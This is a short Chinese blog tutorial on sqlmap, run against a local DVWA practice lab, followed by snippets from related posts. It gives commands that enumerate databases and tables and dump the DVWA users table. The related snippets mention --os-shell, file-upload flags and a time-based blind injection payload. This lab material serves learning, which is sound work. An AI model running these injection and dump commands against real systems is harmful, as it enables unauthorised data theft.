sqlmap使用

已于 2023-08-28 21:41:51 修改
阅读量336 收藏
点赞数
文章标签: web安全 sql
于 2023-08-28 21:40:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51230014/article/details/132548875
版权

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="PHPSESSID=af36i2m412p2cgn4q2lnkt3d03; security=low"

参数介绍:

-u “要攻击的目标网址”--cookie=“网站cookie值”

查看cookie(告诉sqlmap不用登录,已经登录过了)

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="PHPSESSID=af36i2m412p2cgn4q2lnkt3d03; security=low" 上面这条命令后面分别添加以下参数后的功能 

1、--bds(查看可用的数据库)

 

2、 

 -D dvwa --tables

3、 

 -D dvwa -T users --columns

4、 

 -D dvwa -T users --dump

yyc_824
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 5万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQLSQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
sqlmap使用教程
热门推荐
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
SQLmap
AmyBaby00的博客
10-21 2850
本文为学习笔记,仅限学习交流 不得利用、从事危害国家或人民安全、荣誉和利益等活动 SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。 方法:打开sqlmap输入Python sqlmap.py -u +url 1、指定目标注入地址)检测出存在可利用漏洞 python2 sqlmap.py -u “http://127.0.0.1/sqli/less...
sqlmap -d mysql_sqlmap -d –os-shell 参数的使用
weixin_35540825的博客
01-21 1377
sqlmap是一款注入的神器,简介就不多说了。之前的文章也有相应的介绍,这一篇文章主要说一下-d以及–os-shell 参数的使用0×00–os-shell–os-shell也就是从注入点获得一个交互式的shell,可以执行一定的系统命令,当然要求注入点拥有文件的写权限,下面适量个针对 mssql 以及mysql的实例mssql:参数解释:–random-agent 随机使用user-agen...
渗透测试工具sqlmap基础教程
最新发布
分享编程技术、项目开发、实用工具。
07-17 25万+
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap
sqlmap
qq_37027540的博客
07-09 470
sqlmap 五种漏洞检测技术 基于布尔类型的盲注检测 依靠真假检测 基于时间类型的盲注检测 ' and select * from (select(sleep(20))a)-- 过二十秒再执行 基于错误的检测 根据数据库返回的错误信息检测 基于union的联合查询 试用于循环输出 没有循环可以使用limit 基于堆叠的查询 使用分号,同时执行多个命令 Targe...
Sqlmap命令大全
学习、分享、交流
05-26 2万+
Sqlmap:开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能 够查看数据,文件系统访问,甚至能够操作系统命令执行。
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
Sqlmap使用手册中文版
01-13
学习使用Sqlmap,除了阅读其官方文档和用户手册,还可以配合像sqli-labs这样的实验系统进行实践。用户手册详尽地介绍了Sqlmap的所有选项和开关,提供了丰富的实例,帮助用户理解和掌握如何有效使用这个工具。 当...
最全sqlmap命令
gzy1616的博客
03-06 541
-search 搜索数据库名、表明、列名,需要与-D -T或-C 联用。--columns 在-D -T情况下输出表中所有列名。-C column 在-D -T情况下输出某列数据的值。--tables 在-D情况下输出库中所有表名。--file-dest 上传文件(指定目标机器路径)--file-write 上传文件(指定本地路径)
SQLmap教程
Panda_Sanko的博客
03-06 2098
一、Sqlmap直连数据库:-d 服务型数据库(前提知道数据库用户名和密码) : DBMS://USER:PASSWORD@DBMS_ IP:DBMS_ PORT/DATABASE NAME 文件型数据库(前提知道数据库绝对路径): DBMS://DATABASE_ FIL EPATH (SQL ite, Microsoft Access, Firebird, etc. ) 例如: python sqlmap.py -d “myspl://admin: admin@ 192 168 21.17:3306/t
Sqlmap常用命令总结
jemus17的博客
02-26 3936
sql注入,sqlmap的常用命令总结
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了_sqlmap使用教程
2401_84182758的博客
04-12 1077
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
Sqlmap详解
weixin_44311721的博客
04-17 2627
(1)Target(指定扫描目标) –version 查看sqlmap版本 1、-u + url (get方法提交参数) 2、-p + 指定参数(使–level失效) 3、-f (footprint 指纹) 注入结束后,查看数据库指纹信息(如:数据库版本) 4、–users 查询数据库账号信息 5、-- banner 查询数据库据库信息 6、–dbs 查询目标有哪些数据库 7、–schema 查看...
史上最详细sqlmap入门教程
weixin_44867191的博客
05-16 1万+
最近做安全测试,遇到了SQL盲注的漏洞,从发现漏洞,确认漏洞,协助开发复现漏洞,验证漏洞一整套流程下来,有了亿点点收获,下面分享给大家,希望对软件测试同学有所启发,难度不大,小白看完也能上手的那种。
sqlmap使用详解
ben_na_的博客
01-27 364
一、sqlmap基本使用 1、判断是否存在注入 (1) 当检测参数为一个的时候:python2 sqlmap.py -u http://localhost/sqli-master/Less-1/?id=1 (2)当参数大于等于两个时,需要加双引号:python2 sqlmap.py -u "http://localhost/sqli-master/Less-1/?id=1&uid=3" (3)当测试的位置是cookie或者post传值等位置时,需将获得流量包保存在txt文件中进行测试:python
sqlmap 使用指令
09-22
下面是一些常用的 sqlmap 使用指令: 1. 扫描目标网站是否存在 SQL 注入漏洞: `python sqlmap.py -u <URL>` 例如:`python sqlmap.py -u http://www.example.com/index.php?id=1` 2. 检测目标网站是否存在 SQL...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值